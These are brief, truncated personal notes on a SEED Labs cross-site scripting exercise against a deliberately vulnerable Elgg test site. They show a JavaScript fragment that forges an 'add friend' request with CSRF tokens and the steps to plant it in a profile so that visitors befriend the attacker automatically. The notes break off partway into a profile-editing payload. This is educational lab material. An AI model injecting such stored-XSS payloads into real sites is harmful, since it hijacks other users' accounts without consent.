seed lab - web security 2 - xss lab
1. Lab Setup
same as csrf lab.
2. xss Attack - add friend
2.1 Vim “xssaddfriend.txt”
var sendurl=“http://www.xsslabelgg.com/action/friends/add”+"?friend=47"+token+ts;
Ajax.open(“GET”,sendurl,true);
2.2 Open www.xsslabelgg.com.
Login as Samy/seedsamy.
edit profile about : copy and paste, save
2.3 Alice visit members - Samy
Login as Alice/seedalice, browse members samy, then samy is added as a friend automatically.
3. xss Attack- edit profile
3.1 vim xsseditprofile.txt
var desc="&